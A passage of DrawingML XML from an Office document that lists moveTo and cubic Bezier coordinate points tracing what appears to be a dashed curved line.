                    <a:pt x="407" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="402" y="234"/>
                    <a:pt x="396" y="238"/>
                    <a:pt x="391" y="243"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="244"/>
                    <a:pt x="389" y="247"/>
                    <a:pt x="391" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="392" y="250"/>
                    <a:pt x="395" y="250"/>
                    <a:pt x="396" y="249"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="366" y="275"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="270"/>
                    <a:pt x="376" y="266"/>
                    <a:pt x="381" y="262"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="383" y="260"/>
                    <a:pt x="383" y="258"/>
                    <a:pt x="381" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="254"/>
                    <a:pt x="377" y="254"/>
                    <a:pt x="376" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="260"/>
                    <a:pt x="366" y="264"/>
                    <a:pt x="361" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="270"/>
                    <a:pt x="359" y="273"/>
                    <a:pt x="360" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362" y="276"/>
                    <a:pt x="364" y="276"/>
                    <a:pt x="366" y="275"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="337" y="302"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="297"/>
                    <a:pt x="346" y="292"/>
                    <a:pt x="351" y="288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="287"/>
                    <a:pt x="353" y="284"/>
                    <a:pt x="351" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="281"/>
                    <a:pt x="347" y="281"/>
                    <a:pt x="346" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="287"/>
                    <a:pt x="336" y="291"/>
                    <a:pt x="331" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="297"/>
                    <a:pt x="329" y="300"/>
                    <a:pt x="331" y="302"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="303"/>
                    <a:pt x="335" y="303"/>
                    <a:pt x="337" y="302"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="308" y="330"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="325"/>
                    <a:pt x="318" y="320"/>
                    <a:pt x="322" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="314"/>
                    <a:pt x="324" y="311"/>
                    <a:pt x="322" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="308"/>
                    <a:pt x="318" y="308"/>
                    <a:pt x="317" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="312" y="315"/>
                    <a:pt x="307" y="319"/>
                    <a:pt x="303" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="326"/>
                    <a:pt x="301" y="328"/>
                    <a:pt x="303" y="330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="304" y="331"/>
                    <a:pt x="307" y="331"/>
                    <a:pt x="308" y="330"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="281" y="359"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="354"/>
                    <a:pt x="290" y="349"/>
                    <a:pt x="294" y="344"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296" y="343"/>
                    <a:pt x="296" y="340"/>
                    <a:pt x="294" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="293" y="337"/>
                    <a:pt x="290" y="337"/>
                    <a:pt x="289" y="339"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="344"/>
                    <a:pt x="280" y="349"/>
                    <a:pt x="275" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="274" y="355"/>
                    <a:pt x="274" y="358"/>
                    <a:pt x="275" y="359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="361"/>
                    <a:pt x="280" y="360"/>
                    <a:pt x="281" y="359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="359"/>
                    <a:pt x="281" y="359"/>
                    <a:pt x="281" y="359"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="255" y="389"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="384"/>
                    <a:pt x="263" y="379"/>
                    <a:pt x="268" y="374"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="269" y="372"/>
                    <a:pt x="269" y="370"/>
                    <a:pt x="267" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="367"/>
                    <a:pt x="263" y="367"/>
                    <a:pt x="262" y="369"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="257" y="374"/>
                    <a:pt x="253" y="379"/>
                    <a:pt x="249" y="384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="247" y="386"/>
                    <a:pt x="247" y="388"/>
                    <a:pt x="249" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="391"/>
                    <a:pt x="253" y="391"/>
                    <a:pt x="255" y="389"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="230" y="420"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="415"/>
                    <a:pt x="238" y="410"/>
                    <a:pt x="242" y="404"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244" y="403"/>
                    <a:pt x="243" y="400"/>
                    <a:pt x="242" y="399"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="397"/>
                    <a:pt x="237" y="398"/>
                    <a:pt x="236" y="399"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="405"/>
                    <a:pt x="228" y="410"/>
                    <a:pt x="223" y="415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222" y="417"/>
                    <a:pt x="222" y="419"/>
                    <a:pt x="224" y="421"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="422"/>
                    <a:pt x="228" y="422"/>
                    <a:pt x="230" y="420"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="206" y="452"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="447"/>
                    <a:pt x="214" y="441"/>
                    <a:pt x="218" y="436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="219" y="434"/>
                    <a:pt x="219" y="432"/>
                    <a:pt x="217" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="429"/>
                    <a:pt x="213" y="429"/>
                    <a:pt x="211" y="431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="437"/>
                    <a:pt x="203" y="442"/>
                    <a:pt x="199" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="449"/>
                    <a:pt x="199" y="452"/>
                    <a:pt x="200" y="453"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="454"/>
                    <a:pt x="205" y="454"/>
                    <a:pt x="206" y="452"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="183" y="485"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="479"/>
                    <a:pt x="191" y="474"/>
                    <a:pt x="194" y="468"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="467"/>
                    <a:pt x="195" y="464"/>
                    <a:pt x="193" y="463"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="462"/>
                    <a:pt x="189" y="462"/>
                    <a:pt x="188" y="464"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="469"/>
                    <a:pt x="180" y="475"/>
                    <a:pt x="177" y="481"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="482"/>
                    <a:pt x="176" y="485"/>
                    <a:pt x="178" y="486"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="487"/>
                    <a:pt x="182" y="487"/>
                    <a:pt x="183" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="485"/>
                    <a:pt x="183" y="485"/>
                    <a:pt x="183" y="485"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="162" y="519"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="513"/>
                    <a:pt x="169" y="507"/>
                    <a:pt x="172" y="502"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="500"/>
                    <a:pt x="173" y="497"/>
                    <a:pt x="171" y="496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="495"/>
                    <a:pt x="167" y="496"/>
                    <a:pt x="166" y="498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="503"/>
                    <a:pt x="159" y="509"/>
                    <a:pt x="155" y="515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="517"/>
                    <a:pt x="154" y="519"/>
                    <a:pt x="156" y="520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="521"/>
                    <a:pt x="161" y="521"/>
                    <a:pt x="162" y="519"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="142" y="553"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="547"/>
                    <a:pt x="148" y="542"/>
                    <a:pt x="152" y="536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="534"/>
                    <a:pt x="152" y="532"/>
                    <a:pt x="150" y="530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="529"/>
                    <a:pt x="146" y="530"/>
                    <a:pt x="145" y="532"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="538"/>
                    <a:pt x="138" y="544"/>
                    <a:pt x="135" y="549"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="551"/>
                    <a:pt x="134" y="554"/>
                    <a:pt x="136" y="555"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="556"/>
                    <a:pt x="141" y="555"/>
                    <a:pt x="142" y="553"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="123" y="589"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="583"/>
                    <a:pt x="129" y="577"/>
                    <a:pt x="132" y="571"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="569"/>
                    <a:pt x="132" y="566"/>
                    <a:pt x="131" y="565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="564"/>
                    <a:pt x="126" y="565"/>
                    <a:pt x="125" y="567"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="573"/>
                    <a:pt x="119" y="579"/>
                    <a:pt x="116" y="585"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="587"/>
                    <a:pt x="116" y="589"/>
                    <a:pt x="118" y="590"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="591"/>
                    <a:pt x="122" y="591"/>
                    <a:pt x="123" y="589"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="105" y="625"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="619"/>
                    <a:pt x="111" y="613"/>
                    <a:pt x="114" y="607"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="605"/>
                    <a:pt x="114" y="602"/>
                    <a:pt x="112" y="601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="600"/>
                    <a:pt x="108" y="601"/>
                    <a:pt x="107" y="603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="609"/>
                    <a:pt x="101" y="615"/>
                    <a:pt x="98" y="621"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="623"/>
                    <a:pt x="98" y="626"/>
                    <a:pt x="100" y="627"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="627"/>
                    <a:pt x="105" y="627"/>
                    <a:pt x="105" y="625"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="89" y="661"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="655"/>
                    <a:pt x="95" y="649"/>
                    <a:pt x="97" y="643"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="641"/>
                    <a:pt x="97" y="638"/>
                    <a:pt x="95" y="638"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="637"/>
                    <a:pt x="91" y="638"/>
                    <a:pt x="90" y="640"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="646"/>
                    <a:pt x="85" y="652"/>
                    <a:pt x="82" y="658"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="660"/>
                    <a:pt x="82" y="663"/>
                    <a:pt x="84" y="663"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="664"/>
                    <a:pt x="89" y="663"/>
                    <a:pt x="89" y="661"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="75" y="698"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="692"/>
                    <a:pt x="79" y="686"/>
                    <a:pt x="82" y="680"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="678"/>
                    <a:pt x="82" y="675"/>
                    <a:pt x="80" y="675"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="674"/>
                    <a:pt x="75" y="675"/>
                    <a:pt x="74" y="677"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="683"/>
                    <a:pt x="70" y="689"/>
                    <a:pt x="67" y="696"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="698"/>
                    <a:pt x="67" y="700"/>
                    <a:pt x="70" y="701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="702"/>
                    <a:pt x="74" y="701"/>
                    <a:pt x="75" y="698"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="698"/>
                    <a:pt x="75" y="698"/>
                    <a:pt x="75" y="698"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="61" y="736"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="730"/>
                    <a:pt x="66" y="724"/>
                    <a:pt x="68" y="717"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="715"/>
                    <a:pt x="68" y="713"/>
                    <a:pt x="65" y="712"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="711"/>
                    <a:pt x="61" y="713"/>
                    <a:pt x="60" y="715"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="721"/>
                    <a:pt x="56" y="727"/>
                    <a:pt x="54" y="734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="736"/>
                    <a:pt x="54" y="738"/>
                    <a:pt x="56" y="739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="739"/>
                    <a:pt x="61" y="738"/>
                    <a:pt x="61" y="736"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="50" y="774"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="768"/>
                    <a:pt x="53" y="762"/>
                    <a:pt x="55" y="755"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="753"/>
                    <a:pt x="55" y="751"/>
                    <a:pt x="53" y="750"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="750"/>
                    <a:pt x="48" y="751"/>
                    <a:pt x="48" y="753"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="759"/>
                    <a:pt x="44" y="766"/>
                    <a:pt x="42" y="772"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="774"/>
                    <a:pt x="43" y="777"/>
                    <a:pt x="45" y="777"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="778"/>
                    <a:pt x="49" y="777"/>
                    <a:pt x="50" y="774"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="39" y="813"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="807"/>
                    <a:pt x="43" y="800"/>
                    <a:pt x="44" y="794"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="792"/>
                    <a:pt x="44" y="789"/>
                    <a:pt x="41" y="789"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="788"/>
                    <a:pt x="37" y="789"/>
                    <a:pt x="37" y="792"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="798"/>
                    <a:pt x="33" y="805"/>
                    <a:pt x="32" y="811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="813"/>
                    <a:pt x="32" y="815"/>
                    <a:pt x="34" y="816"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="816"/>
                    <a:pt x="39" y="815"/>
                    <a:pt x="39" y="813"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="30" y="852"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="845"/>
                    <a:pt x="33" y="839"/>
                    <a:pt x="35" y="832"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="830"/>
                    <a:pt x="34" y="828"/>
                    <a:pt x="32" y="828"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="827"/>
                    <a:pt x="27" y="828"/>
                    <a:pt x="27" y="831"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="837"/>
                    <a:pt x="24" y="844"/>
                    <a:pt x="23" y="850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="852"/>
                    <a:pt x="24" y="855"/>
                    <a:pt x="26" y="855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="855"/>
                    <a:pt x="30" y="854"/>
                    <a:pt x="30" y="852"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="23" y="891"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="885"/>
                    <a:pt x="25" y="878"/>
                    <a:pt x="27" y="871"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="869"/>
                    <a:pt x="26" y="867"/>
                    <a:pt x="23" y="867"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="866"/>
                    <a:pt x="19" y="868"/>
                    <a:pt x="19" y="870"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="877"/>
                    <a:pt x="16" y="883"/>
                    <a:pt x="15" y="890"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="892"/>
                    <a:pt x="16" y="894"/>
                    <a:pt x="18" y="894"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="895"/>
                    <a:pt x="23" y="893"/>
                    <a:pt x="23" y="891"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="17" y="931"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="924"/>
                    <a:pt x="19" y="917"/>
                    <a:pt x="20" y="911"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="909"/>
                    <a:pt x="19" y="907"/>
                    <a:pt x="17" y="906"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="906"/>
                    <a:pt x="12" y="907"/>
                    <a:pt x="12" y="910"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="916"/>
                    <a:pt x="10" y="923"/>
                    <a:pt x="9" y="930"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="932"/>
                    <a:pt x="10" y="934"/>
                    <a:pt x="13" y="934"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="934"/>
                    <a:pt x="17" y="933"/>
                    <a:pt x="17" y="931"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="13" y="970"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="964"/>
                    <a:pt x="14" y="957"/>
                    <a:pt x="15" y="950"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="948"/>
                    <a:pt x="13" y="946"/>
                    <a:pt x="11" y="946"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="946"/>
                    <a:pt x="7" y="947"/>
                    <a:pt x="7" y="949"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="956"/>
                    <a:pt x="5" y="963"/>
                    <a:pt x="5" y="969"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="972"/>
                    <a:pt x="6" y="974"/>
                    <a:pt x="8" y="974"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="974"/>
                    <a:pt x="13" y="972"/>
                    <a:pt x="13" y="970"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="10" y="1010"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="1003"/>
                    <a:pt x="11" y="997"/>
                    <a:pt x="11" y="990"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="988"/>
                    <a:pt x="10" y="986"/>
                    <a:pt x="7" y="986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="986"/>
                    <a:pt x="3" y="987"/>
                    <a:pt x="3" y="990"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="996"/>
                    <a:pt x="2" y="1003"/>
                    <a:pt x="2" y="1010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="1012"/>
                    <a:pt x="3" y="1014"/>
                    <a:pt x="6" y="1014"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1014"/>
                    <a:pt x="10" y="1012"/>
                    <a:pt x="10" y="1010"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="8" y="1050"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1043"/>
                    <a:pt x="9" y="1037"/>
                    <a:pt x="9" y="1030"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="1028"/>
                    <a:pt x="7" y="1026"/>
                    <a:pt x="5" y="1026"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="1026"/>
                    <a:pt x="1" y="1027"/>
                    <a:pt x="1" y="1030"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1036"/>
                    <a:pt x="0" y="1043"/>
                    <a:pt x="0" y="1050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1052"/>
                    <a:pt x="2" y="1054"/>
                    <a:pt x="4" y="1054"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="1054"/>
                    <a:pt x="8" y="1052"/>
                    <a:pt x="8" y="1050"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="8" y="1090"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1083"/>
                    <a:pt x="8" y="1077"/>
                    <a:pt x="8" y="1070"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1068"/>
                    <a:pt x="6" y="1066"/>
                    <a:pt x="4" y="1066"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="1066"/>
                    <a:pt x="0" y="1068"/>
                    <a:pt x="0" y="1070"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1077"/>
                    <a:pt x="0" y="1083"/>
                    <a:pt x="0" y="1090"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1092"/>
                    <a:pt x="2" y="1094"/>
                    <a:pt x="4" y="1094"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="1094"/>
                    <a:pt x="8" y="1092"/>
                    <a:pt x="8" y="1090"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="10" y="1130"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="1123"/>
                    <a:pt x="9" y="1116"/>
                    <a:pt x="9" y="1110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="1108"/>
                    <a:pt x="7" y="1106"/>
                    <a:pt x="5" y="1106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="1106"/>
                    <a:pt x="1" y="1108"/>
                    <a:pt x="1" y="1110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1117"/>
                    <a:pt x="2" y="1123"/>
                    <a:pt x="2" y="1130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="1132"/>
                    <a:pt x="4" y="1134"/>
                    <a:pt x="6" y="1134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1134"/>
                    <a:pt x="10" y="1132"/>
                    <a:pt x="10" y="1130"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="13" y="1169"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="1163"/>
                    <a:pt x="12" y="1156"/>
                    <a:pt x="11" y="1150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="1147"/>
                    <a:pt x="9" y="1146"/>
                    <a:pt x="7" y="1146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="1146"/>
                    <a:pt x="3" y="1148"/>
                    <a:pt x="3" y="1150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="1157"/>
                    <a:pt x="4" y="1164"/>
                    <a:pt x="5" y="1170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="1172"/>
                    <a:pt x="7" y="1174"/>
                    <a:pt x="9" y="1174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="1174"/>
                    <a:pt x="13" y="1172"/>
                    <a:pt x="13" y="1169"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="17" y="1209"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="1202"/>
                    <a:pt x="16" y="1196"/>
                    <a:pt x="15" y="1189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="1187"/>
                    <a:pt x="13" y="1186"/>
                    <a:pt x="11" y="1186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1186"/>
                    <a:pt x="7" y="1188"/>
                    <a:pt x="7" y="1190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1197"/>
                    <a:pt x="9" y="1203"/>
                    <a:pt x="9" y="1210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="1212"/>
                    <a:pt x="12" y="1214"/>
                    <a:pt x="14" y="1214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="1213"/>
                    <a:pt x="18" y="1211"/>
                    <a:pt x="17" y="1209"/>
                  </a:cubicBezTo>
